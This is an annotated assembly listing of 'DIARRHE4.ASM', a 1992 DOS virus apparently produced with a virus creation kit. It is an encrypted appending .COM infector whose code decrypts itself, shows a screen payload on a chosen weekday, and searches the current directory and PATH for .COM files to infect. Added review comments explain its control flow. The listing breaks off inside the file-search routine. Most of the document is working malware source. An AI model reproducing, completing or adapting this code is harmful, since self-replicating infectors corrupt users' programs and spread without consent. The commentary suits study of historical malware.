Assembly Source File
|
1992-08-07
|
18KB
|
425 lines
; DIARRHE4.ASM -- DIARRHEA 4
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by URNST KOUCH
; Generator configuration flags. Their meaning is taken from the author's own
; comments; whether they are referenced later in the file is not visible in
; this part of the listing.
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
; Single-segment image assembled at offset 0100h with CS, DS, ES and SS all
; assumed to be the same segment, i.e. the layout of a DOS .COM program.
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
;-----------------------------------------------------------------------
; main -- entry stub, date-triggered screen payload, and hand-off to the
;         host program.  16-bit real-mode DOS code (int 21h / int 10h).
;
; Flow, as visible in this listing:
;   1. call/pop/sub computes the displacement between where the code was
;      assembled and where it is actually running.
;   2. encrypt_decrypt (defined outside this view) is called on the body.
;   3. Three saved bytes are copied from `buffer` back to 0100h, and 0100h
;      is pushed so that the final RET resumes the host program.
;   4. The DTA is redirected to a 128-byte buffer on the stack; only the
;      offset of the previous DTA is saved.
;   5. If get_weekday returns 5, `data00` is unpacked into text-mode video
;      memory (display-only payload).
;   6. search_files is called, the DTA and stack are restored, the general
;      registers are zeroed, and RET transfers to 0100h.
;
; Register roles after the stub: DI = displacement (base for data such as
; data00), BP = frame pointer for the stack DTA buffer.
;
; NOTE(review): is_encrypted equ 1 and the call placed immediately before
; start_of_code suggest that everything from start_of_code onward is stored
; encrypted, leaving only the short stub above it constant on disk --
; confirm against encrypt_decrypt, which is not in view.
;-----------------------------------------------------------------------
main proc near
; Three-byte placeholder: E9 00 00 is a near JMP with zero displacement,
; so execution simply falls through to `start`.
db 0E9h,00h,00h ; Near jump (for compatibility)
; CALL pushes the address of find_offset; POP retrieves it at run time.
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
; BP = runtime address - assembled address.  Every later data reference
; adds this displacement ([bp + ...], then [di + ...] once it moves to DI).
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
; Put the host's first three bytes back in memory at 0100h.  The pushed
; 0100h is the return address consumed by the RET at the end of main.
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
; DI takes over as the displacement so BP can serve as a frame pointer.
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
; int 21h AH=2Fh returns the current DTA in ES:BX.  Only BX is pushed; the
; segment part is not saved.
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
; Redirect the DTA to the stack buffer so file searches do not overwrite
; the default DTA the host would see.
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
; Payload trigger.  get_weekday is not visible here; 5 is presumably Friday
; if it follows the DOS 0=Sunday numbering -- TODO confirm.
call get_weekday
cmp ax,0005h ; Did the function return 5?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
; ---- Screen payload: unpack a compressed text screen to video memory ----
; SI = packed data, CX = packed length in bytes (0107h = 263).
strt00: lea si,[di + data00] ; SI points to data
mov cx,0107h ; Second argument is 263
push di ; Save DI
push es ; Save ES
; CX was just loaded with a non-zero constant, so this exit is never taken.
jcxz uncrunch_done ; Exit if there are no characters
; Read the current video mode (returned in AL) and set the same mode again,
; which clears the screen.
mov ah,0Fh ; BIOS get screen mode function
int 10h
xor ah,ah ; BIOS set screen mode function
int 10h ; Clear the screen
; ES:DI = B800:0000, the colour text-mode buffer.  DX tracks the offset of
; the start of the current row; AH carries the current attribute byte.
xor di,di
mov ax,0B800h ; AX is set to video segment
mov es,ax ; ES holds video segment
mov dx,di ; Save X coordinate for later
xor ax,ax ; Set current attributes
cld
; Main decode loop: bytes >= 32 are literal characters written together
; with the attribute in AH; bytes < 32 are control codes handled below.
loopa: lodsb ; Get next character
cmp al,32 ; Is it a control character?
jb foreground ; Handle it if it is
stosw ; Save letter on screen
next: loop loopa ; Repeat until we're done
jmp short uncrunch_done ; Leave this routine
; Codes 0-15: replace the low nibble (foreground colour) of the attribute.
foreground: cmp al,16 ; Are we changing the foreground?
jnb background ; If not, check the background
and ah,0F0h ; Strip off old foreground
or ah,al ; Put the new one on
jmp short next ; Resume looping
; Codes 16-23: background colour, shifted into the high nibble.
background: cmp al,24 ; Are we changing the background?
je next_line ; If AL = 24, go to next line
jnb flash_bit_toggle ; If AL > 24 set the flash bit
sub al,16 ; Change AL to a color number
add al,al ; Crude way of shifting left
add al,al ; four bits without changing
add al,al ; CL or wasting space. Ok,
add al,al ; I guess.
; NOTE(review): the mask is applied to AL, not AH.  It clears bits 4-6 of
; the value just shifted into AL and leaves AH untouched, so the code does
; not do what the "strip off old background" comment describes.
and al,08Fh ; Strip off old background
or ah,al ; Put the new one on
jmp short next ; Resume looping
; Code 24: advance to the next row (80 cells x 2 bytes = 160).
next_line: add dx,160 ; Skip a whole line (80 chars.
mov di,dx ; AND 80 attribs.)
jmp short next ; Resume looping
; Codes 25 and 26 are run-length codes, 27 toggles the blink bit, and
; anything above 27 is ignored.
flash_bit_toggle: cmp al,27 ; Is it a blink toggle?
jb multi_output ; If AL < 27, it's a blinker
jne next ; Otherwise resume looping
xor ah,128 ; Toggle the flash bit
jmp short next ; Resume looping
; Run-length output: code 25 repeats a space, code 26 repeats the character
; that follows the count byte.  The run is count+1 cells long.  BX holds the
; outer byte counter while CX is used by REP STOSW.
multi_output: cmp al,25 ; Set Zero flag if multi-space
mov bx,cx ; Save main counter
lodsb ; Get number of repetitions
mov cl,al ; Put it in CL
mov al,' ' ; AL holds a space
jz start_output ; If displaying spaces, jump
lodsb ; Otherwise get character to use
dec bx ; Adjust main counter
start_output: xor ch,ch ; Clear CH
inc cx ; Add one to count
rep stosw ; Display the character
mov cx,bx ; Restore main counter
dec cx ; Adjust main counter
loopnz loopa ; Resume looping if not done
uncrunch_done: pop es ; Restore ES
pop di ; Restore DI
; ---- End of payload; the file search/modification routine runs every time,
; whether or not the payload was shown ----
end00: call search_files ; Find and infect a file
; Restore the caller's DTA offset saved earlier (DS:DX form of AH=1Ah).
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
; SP returns to the slot holding the pushed 0100h.
mov sp,bp ; Deallocate local buffer
; General registers are cleared before control passes to the host.
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
; RET pops the 0100h pushed at start_of_code, so execution continues at the
; start of the host image, whose first three bytes were put back above.
ret ; Return to original program
main endp
search_files proc near
mov bx,di ; BX points to the virus
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call traverse_path ; Start the traversal
traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
lea dx,[bx + com_mask] ; DX points to "*.COM"
push di
mov di,bx
call find_files ; Try to infect a .COM file
mov bx,di
pop di
jnc done_searching ; If successful the exit
jmp short traversal_loop ; Keep checking the PATH
done_searching: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not then exit
stc ; Set the carry flag for failure
at_least_tried: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; R